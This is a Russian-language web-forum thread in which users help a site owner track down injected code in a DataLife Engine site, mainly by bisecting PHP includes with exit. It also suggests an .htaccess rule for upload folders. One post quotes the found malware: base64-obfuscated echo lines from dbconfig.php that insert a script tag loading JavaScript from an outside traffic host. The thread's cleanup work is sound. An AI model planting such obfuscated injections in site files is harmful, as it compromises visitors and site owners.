Вредоносный код в DLE

123
Metal Messiah
На сайте с 01.08.2010
Offline
163
#11

можно поиском по БД пройтись

в случае с форумами именно там чаще искать надо

PS Total ищет и по FTP

PS2 ставь в файлы брекпоинты типа echo "bb1";

anonymous, думай что говоришь и не забывай подписать отзыв :)
erotic
На сайте с 26.02.2010
Offline
37
#12

на днях похожее было. нашел тут \engine\classes\js\menu.js

Я езжу на Opel Astra J GTC 1.4 MT6 (http://www.drive2.ru/cars/opel/astra_j_gtc/astra_j_gtc/andro07/)
[Удален]
#13
„выше чем DOCTYPE”

Получается, что для вывода вредоносного кода используется конструкция echo/print. Значит, нужно искать вредоносную функцию в PHP файлов, а для этого используйте функцию exit() или die(), чтобы быстрее найти её.

Идея такова:

1) добавьте exit; после включенного PHP файла и обновите страницу сайта;

2) если код не виден, удалите exit;, найдите следующего файла и повторите пункт #1;

В общем, нужно сделать это до тех пор пока не появиться вредоносный код. После этого, откройте и внимательно анализируйте файл.

Думаю, стоит начинать с файла init.php, после require ENGINE_DIR . '/modules/functions.php'; добавьте exit; — если появится вредоносный код, скорее всего код находиться в файле functions.php. Чтобы убедиться в этом, добавьте exit; перед require ENGINE_DIR . '/modules/functions.php'; и если больше не увидите код — 100% нужно анализировать functions.php. В противном случае, нужно искать файлы включенные ”выше”.

D
На сайте с 04.02.2010
Offline
9
#14
erotic:
на днях похожее было. нашел тут \engine\classes\js\menu.js

У меня папка js отсутствует

w0den:

Думаю, стоит начинать с файла init.php, после require ENGINE_DIR . '/modules/functions.php'; добавьте exit; — если появится вредоносный код, скорее всего код находиться в файле functions.php. Чтобы убедиться в этом, добавьте exit; перед require ENGINE_DIR . '/modules/functions.php'; и если больше не увидите код — 100% нужно анализировать functions.php. В противном случае, нужно искать файлы включенные ”выше”.

Ставил и ниже, и выше. В исходном коде код всё равно присутствует

Высочайший конверт (http://jincash.ru/?ref_id=3731)
[Удален]
#15

„Ставил и ниже, и выше.”

Если я правильно понял, Вы добавили exit; только перед/после require ENGINE_DIR . '/modules/functions.php';. Правильно? Если да, обратите пожалуйста внимание на то, что нужно искать файлы включенные выше и добавить exit; после/перед ними (например, require_once ENGINE_DIR . '/classes/mysql.php')

Попробуйте добавить exit; в начале файла init.php — если опять-же увидите вредоносный код, значит Вы что-то делайте неправильно, либо (учитывая что Вы проверили файл index.php) — DLE тут не причём.

D
На сайте с 04.02.2010
Offline
9
#16

Нашел заразу, неужели!

echo base64_decode('PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgY2hhcnNldD0id2luZG93cy0xMjUxIiByZWw9Im5vZm9sbG93IiBzcmM9Imh0dHA6Ly90cmFmZmlray5iaXovanMvaWYucGhwP2lkPTc5NTEiPjwvc2NyaXB0Pg==');
echo base64_decode ('PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgY2hhcnNldD0id2luZG93cy0xMjUxIiByZWw9Im5vZm9sbG93IiBzcmM9Imh0dHA6Ly90cmFmZmlray5iaXovanMvaWYucGhwP2lkPTc5NzQiPjwvc2NyaXB0Pg==');

Находилась в dbconfig.php, нашел после того, как поставил exit; после require_once ENGINE_DIR . '/data/dbconfig.php';

w0den, вы очень помогли, спасибо огромное за помощь.

[Удален]
#17

Поздравляю.

Рад что смог помочь.

Кстати, анализируйте install.php — скорее всего вредоносный код попал в файле dbconfig.php при установке скрипта.

[Удален]
#18

Интересно каким именно макаром эта гадина туда залила шэл

WS
На сайте с 17.11.2010
Offline
25
#19
Deia:
Взлом был сделан посредством аплоада шелла by oRb. Шелл удалил, а код найти не могу

Вы уверены? На всякий случай максимально тщательно проверьте ваш комп на вирусы и трояны, примерно 90% случаев (возможно и больше) появления вредоносного кода в файлах это кража пароля от фтп.

Ну и пароль к фтп тоже проверьте, чтобы опять этот код не ловить.

[Удален]
#20

Создайте в uploads/fotos и в uploads/files файл: .htaccess

В него запишите:

php_flag engine off

AddType .php
123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий